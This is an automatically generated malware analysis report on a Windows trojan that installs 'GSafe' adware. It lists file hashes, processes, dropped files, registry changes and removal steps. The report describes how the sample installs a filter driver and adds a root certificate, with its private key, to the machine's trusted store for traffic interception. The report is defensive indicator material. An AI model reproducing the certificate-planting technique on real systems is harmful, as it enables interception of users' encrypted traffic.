Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b6f079be120993d11a08a472b4e42c9d
SHA1: 87a9b9d5ba403571e0b5f118d1d40b5622516757
SHA256: d27673e5a6b4e58f900786526bb49290148c6cccdb9dc030cf867822fe97be9d
SSDeep: 768:s1cVhpQI2EQK0iPDh84nScF15GYbWjXO3XJV552/K+alin2eFzbng2ask84h:KQpQ5EP0ijnRTXJV5k/K+Yi2eFfgb84h
Size: 51976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800
The Trojan injects its code into the following process(es):
GSafe.exe:1268
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nj_update.exe:1544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\nsh84.tmp (0 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (0 bytes)
%WinDir%\Temp\nsx86.tmp (0 bytes)
The process GSafe.exe:832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process GSafe.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (0 bytes)
The process %original file name%.exe:1244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (0 bytes)
The process gsafe_setup.exe:1800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (0 bytes)
%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (0 bytes)
Registry activity
The process nj_update.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 1B 5D 50 F7 21 67 4E 69 17 52 91 DD 15 22 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayVersion" = "1.1.0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GSafe]
"Version" = "1.1.0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The process GSafe.exe:832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\GSafe]
"instid" = "2rLVemqiV8QPrfThkbebR75aYB35Y4gu"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "9"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A6FBE8F491681C4D381A094958E89BD8A84108E2]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 A6 FB E8 F4" (first 16 bytes only, as for every binary value in this report; the leading property record, id 3 with length 0x14, is the certificate's SHA-1 hash, whose first bytes A6 FB E8 F4 match the key name)
This subkey is the machine-wide Trusted Root Certification Authorities store: the certificate with SHA-1 thumbprint A6FBE8F491681C4D381A094958E89BD8A84108E2 becomes trusted for every user of the host. The same process also writes a private-key file (GSafe Intermediate SSL.pvk) next to a certificate of the same name under %WinDir%\Temp\GSafe\SSL (see the file activity above).
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 3E 31 84 2A 84 10 E2 5C 3C 59 C1 19 5B B9 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The process sets the following Internet Explorer Local intranet zone options to their Windows defaults. These are the values WinINet writes when Internet settings are first initialised in a profile hive, here the LocalService / HKU\.DEFAULT hive; they do not map all URLs to the Intranet zone and are not by themselves evidence of tampering:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1" (include all local intranet sites not listed in other zones, i.e. dotless host names)
"UNCAsIntranet" = "1" (include all network paths, UNCs)
"ProxyBypass" = "1" (include all sites that bypass the proxy server)
Proxy settings are disabled, which is also the default:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"A6FBE8F491681C4D381A094958E89BD8A84108E2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process GSafe.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B A6 24 78 3F FD BB 27 9D D7 0A B8 EC 4A 3E 28"
The process GSafe.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 44 6E 90 B5 D5 96 9C 44 4B 23 98 59 DA 4D 8A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The following Local intranet zone options are set to their Windows defaults (written by WinINet when Internet settings are first initialised in this hive; they do not map all URLs to the Intranet zone):
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1" (include all local intranet sites not listed in other zones)
"ProxyBypass" = "1" (include all sites that bypass the proxy server)
"UNCAsIntranet" = "1" (include all network paths, UNCs)
Proxy settings are disabled, which is also the default:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process net1.exe:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC BA DB 8A F7 0E 7E 45 9D E7 10 84 79 54 4A EA"
The process net1.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 C8 CA 09 CA 0A D2 11 29 49 83 10 EA 71 6F A3"
The process net1.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 85 54 67 57 69 7F 8E FE 87 C2 69 62 93 D2 E6"
The process net.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 8E 98 A6 22 0C 5D 90 AF 0E 8C 98 F3 F9 BF 43"
The process net.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 93 6B 55 C5 52 13 64 11 F7 B9 89 0D 3B 81 68"
The process net.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 2E FC B6 45 6C 20 A9 C0 64 F1 E2 42 4B 52 62"
The process %original file name%.exe:1244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 1E C6 BC 65 07 AD 98 6E B1 42 6D E4 D1 CF 96"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The following Local intranet zone options are set to their Windows defaults in the current user's hive (written by WinINet when Internet settings are first initialised for the profile; they do not map all URLs to the Intranet zone):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (include all network paths, UNCs)
"ProxyBypass" = "1" (include all sites that bypass the proxy server)
"IntranetName" = "1" (include all local intranet sites not listed in other zones)
Proxy settings are disabled, which is also the default:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process gsafe_setup.exe:1800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D2 52 06 9D 60 9E 76 4B B4 AE 11 6C 9D 56 48"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GSafe]
"affid" = "hdtv"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online"
"UninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
"DisplayVersion" = "1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS LLC"
[HKLM\SOFTWARE\GSafe]
"Version" = "1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
0661995db9d56791723702f4ea94c5fb | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] |
3a0c5503294cd43c59df4279d2b72d8d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe |
1690feeae024a4584ea1d97c07dee78e | c:\Program Files\GSafe\GSafe.exe |
9155cce4d8c0daf7b4d4c1ada945ce54 | c:\Program Files\GSafe\ProtocolFilters.dll |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files\GSafe\libeay32.dll |
9ff0b75dfb43d58f9d2ebe2697b529c4 | c:\Program Files\GSafe\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\GSafe\nfregdrv.exe |
bd67f6e7a304f684b3513b3a9c535143 | c:\Program Files\GSafe\remove_GSafe.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\GSafe\ssleay32.dll |
0661995db9d56791723702f4ea94c5fb | c:\WINDOWS\Temp\nj_update.exe |
a4b60de83b790c9aa86a367eedc3af2a | c:\WINDOWS\system32\drivers\gfilterdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
